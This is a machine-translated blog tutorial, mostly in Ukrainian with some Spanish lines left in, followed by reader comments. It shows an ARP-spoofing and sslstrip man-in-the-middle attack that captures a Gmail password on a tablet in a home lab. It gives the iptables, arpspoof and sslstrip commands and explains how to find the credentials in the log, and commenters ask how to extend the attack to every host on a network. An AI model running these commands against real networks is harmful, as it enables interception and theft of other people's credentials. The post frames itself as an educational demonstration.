ArpSpoofing та SSlstrip в дії.

Привіт блогери.

На сьогоднішній день у мене є невелика вибірка того, наскільки небезпечним може бути підключення до будь-якої незахищеної мережі тих, що подобається багатьом з нас.

Сьогодні я збираюся використовувати ArpSpoofing разом із Sslstrip, щоб отримати пароль Gmail. Щоб зробити середовище більш контрольованим, я створив обліковий запис під назвою "testarp@gmail.com".

А оскільки преамбули мені не дуже подобаються, приступимо до справи.

Я не несу відповідальності в будь-який час за те, що вони можуть зробити з наведеною нижче інформацією. Я роблю це виключно в освітніх цілях

НАВКОЛИШНЄ СЕРЕДОВИЩЕ

Для цього тесту ми маємо наступне:

1. Зловмисник: Це мій настільний або настільний комп’ютер, який має Debian Wheezy. З репозиторіїв ви можете встановити sslstrip y dsniff дістати мати арфування

2. Жертва: Жертва - це планшет Android, який хоче бачити свою електронну пошту лише через браузер.

3. Засіб: Середина - моя Маршрутизатор Cisco DPC2425

АДРЕСИ.

Адреса зловмисника: 172.26.0.2

Адреса маршрутизатора: 172.26.0.1

Адреса жертви: 172.26.0.8

АТАКА:

Щоб трохи більше зрозуміти, як працює атака, можна перейти до мого старого POST

Перше, що ми зробимо для цієї атаки, це активуємо пересилання, щоб наш комп’ютер міг пересилати інформацію жертві, не усвідомлюючи цього. (Інакше це була б атака на відмову в послугах)

Для цього ми будемо використовувати:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Кожна команда у прямому вікні консолі.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

знімок1

То як же тоді отримати те, що ми хочемо?

Давайте спочатку введемо нашу пошту на планшеті. Під час входу в систему ми бачимо, що на нашій консолі з’являються тисячі і тисячі речей.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

за допомогою Control + W ми шукаємо щось, що називається SECURE POST.

І ми побачимо щось подібне.

знімок2

Серед того величезного рядка, якого неможливо побачити, є електронна пошта та пароль жертви.

Тож ми біжимо праворуч, поки нарешті не побачимо світло в кінці тунелю.

знімок3

В іншому випадку ми побачимо, як ми можемо трохи захиститися від цих атак.

привіт


27 коментарі, залиште свій

Залиште свій коментар

Ваша електронна адреса не буде опублікований. Обов'язкові для заповнення поля позначені *

*

*

  1. Відповідальний за дані: Мігель Анхель Гатон
  2. Призначення даних: Контроль спаму, управління коментарями.
  3. Легітимація: Ваша згода
  4. Передача даних: Дані не передаватимуться третім особам, за винятком юридичних зобов’язань.
  5. Зберігання даних: База даних, розміщена в мережі Occentus Networks (ЄС)
  6. Права: Ви можете будь-коли обмежити, відновити та видалити свою інформацію.

  1.   @Jlcmux - сказав він

    Користуючись нагодою, можу сказати, що коли публікація була опублікована, команди були неправильними.

    У команді iptables в кінці відсутній 8080, який залишився в іншому рядку. І тоді команди arpspoof були в одному рядку. Кожна команда знаходиться в іншому рядку.

    Сподіваємось, редактор це бачить і може це виправити.

    Привіт.

    1.    Мануель де ла Фуенте - сказав він

      Я зробив виправлення, про які ви згадали, це нормально?

      Якщо ви збираєтесь вставити код у бажаний запис, скористайтеся поданням HTML та переконайтеся, що стаття правильна, перш ніж надсилати її на розгляд. Дякую.

  2.   Луїс - сказав він

    Холодно знати, що ті з нас, хто не має знань, такі вразливі. Дуже хороша інформація, навіть коли я мало розумію тему, я усвідомлюю її важливість. Дякую!
    привіт

  3.   Гіскард - сказав він

    Але це працює лише в тому випадку, якщо зловмисник і жертва знаходяться в одній мережі. У будь-якому випадку мені здається, що якщо (перебуваючи в одній мережі) ви підключаєтесь за допомогою HTTPS, цього не відбувається, оскільки дані зашифровані ДО того, як вийти з машини. Якщо ви підключаєтеся за допомогою HTTP (без S), я думаю, що навіть дивлячись на мережевий кабель, ви бачите ключі.

    1.    @Jlcmux - сказав він

      Це неправда. Я зламаю пароль Gmail, і якщо ви помітите, що Gmail використовує https. Так? Справа в тому, що, хоча https безпечний, він залежить від http. Тож це не так безпечно.

      Не зізнавайтеся стільки про https, що S не для Супермена, а для "безпечного"

    2.    Rten - сказав він

      він працює з https або без нього, я спробував це з більш спеціалізованим дистрибутивом Linux, і він працює без проблем

    3.    Мануель де ла Фуенте - сказав він

      Ви можете точно використовувати його, щоб викласти урок тим, хто викрав ваш Wi-Fi. 😀

      Це більш-менш схоже на те, що вони давно сказали в блозі Чеми Алонсо:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Районний - сказав він

        Остія, чудово, що це робить! / І тоді вони говорять моєму параноїку щоразу, коли я використовую VPN, коли вони йдуть перевіряти банківський рахунок…). До речі, ви повинні побачити, наскільки цинічні люди в коментарях ... якщо врешті це крадуть ...

        1.    eliotime3000 - сказав він

          Тепер нам потрібно взяти підручник про те, як створити та запропонувати власну послугу VPN.

      2.    Данило - сказав він

        Історія, на яку ви посилаєтесь, дуже цікава, вона навіть здається гідною нової книги, і це змушує мене згадати, коли я користувався Інтернетом своїх сусідів, і хоча я кажу, що знаю цю тему, я думаю, що ніколи не зміг би побачити справжні розміри небезпека, яку я міг би тривати, на щастя для мене, вони лише змінили пароль на WPA2, і ось тут почалася моя історія з провайдером ха-ха

    4.    Маврикій - сказав він

      Ось чому в назві написано Sslstrip в дії.

      Це працює, поки зловмисник знаходиться посередині

  4.   скоро - сказав він

    Якою хвилею ви працюєте біля призми? -.-
    немає.
    Що ви чекаєте, щоб надіслати ваш запит XD
    що стосується
    хороший пост

  5.   auroszx - сказав він

    Цікаво, пізніше я проведу навчальний тест ... Можливо, я навіть міг би видалити пароль до Wi-Fi і трохи розважитися 😛
    Будь-яким випадком, чи можете ви зробити щось подібне, щоб надіслати різні сторінки на ті, що запитував ціль? Наприклад, вони хочуть відкрити Facebook, а я їх перенаправляю в Google? 😛

    1.    @Jlcmux - сказав він

      Так. Але це все зовсім інший рулон.

      Можливо, я опублікую це пізніше.

  6.   останній новачок - сказав він

    дуже хороший пост, ці теми дуже освітні, тепер нам потрібно мати можливість протистояти цій атаці, оскільки деякі (як я) підключаються до загальнодоступних мереж (наприклад, університету), було б корисно цього уникнути.

    Привіт!

  7.   просто-ще-dl-користувач - сказав він

    У мене це не спрацювало 🙁

  8.   Ого - сказав він

    Мене тут щось не вдає, крім того, що https-з'єднання шифруються через сертифікат сервера (як тільки сертифікат на вашій машині, ваш браузер відповідає за шифрування) за допомогою iptables ви перенаправляєте порт 80 (http), а не 443 що є https

    1.    @Jlcmux - сказав він

      Я теж це думав. Справа в тому, що хоча https і є "безпечним", на жаль, це залежить від http. Отже, sslstrip цим користується, що змушує браузер вважати, що він використовує дані https, але це не так.

      1.    Ого - сказав він

        святе лайно! але браузер повинен побачити попередження типу "цей сертифікат походить із підозрілого сайту або чогось подібного" ... Мені неодмінно доведеться зробити тести XD

        1.    @Jlcmux - сказав він

          Ні, абсолютно нічого не виходить.

  9.   просто-ще-dl-користувач - сказав він

    Нарешті це спрацювало у мене
    Я підключений до мережі WEP за допомогою пароля, і він все одно показав мені пароль безпосередньо.

    Запит. Чи можете ви зробити цю саму процедуру, але для всіх комп'ютерів, які підключені до мережі, замість того, щоб мати одну жертву?

    1.    @Jlcmux - сказав він

      Так, ти можеш. Але я не робив експериментів. Спробуйте самі і розкажіть нам, як у вас справи.

  10.   Сіннік19 - сказав він

    Єдине, що я отримую від цього, це те, що машина жертви переходить в автономний режим, але sslstrip мені нічого не показує: /

    1.    @Jlcmux - сказав він

      Вам потрібно на мить відключити брандмауер. Або принаймні увімкнути вхідні з'єднання.

  11.   Містер Блек - сказав він

    Ми з Probe могли бачити лише ім'я користувача та пароль сторінки facebook, у gmail я не знайшов жодного результату в журналі, також мені знадобився лише рядок arpspoof «arpspoof -i -t«. З іншого боку, машина-жертва не могла відкрити деякі сторінки. Я продовжуватиму розслідування, це дуже цікаво. Допомога тим, хто використовує Manjaro, пакети для встановлення: dsniff (тут arpspoff), twisted та python2-pyopenssl. Sslstrip можна завантажити звідси: http://www.thoughtcrime.org/software/sslstrip/
    Для його запуску $ python2 sslstrip.py
    Привіт.

  12.   Містер Блек - сказав він

    Це не вийшло, але рядок arpspoof: #arpspoof -i int -t ip-жертва ip-маршрутизатор

  13.   Гільберт - сказав він

    Дивись, я роблю саме те, що ти кажеш:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arppoof -i eth0 -t 172.26.0.8 172.26.0.1
    arppoof -i eth0 -t 172.26.0.1 172.26.0.2

    Проблема полягає в тому, що жертва, яка є ще одним комп’ютером, який я маю тут, у своїй кімнаті, залишається без підключення до того моменту, що я повинен перезапустити маршрутизатор, що я можу зробити, допоможіть мені.

    Інша справа, я працюю з віртуальною машиною, і коли я виконую команду iwconfig, wlan0 не з'являється, а також коли я виконую ifconfig, однак, якщо у мене на віртуальній машині є Інтернет, що з інтерфейсом eth0.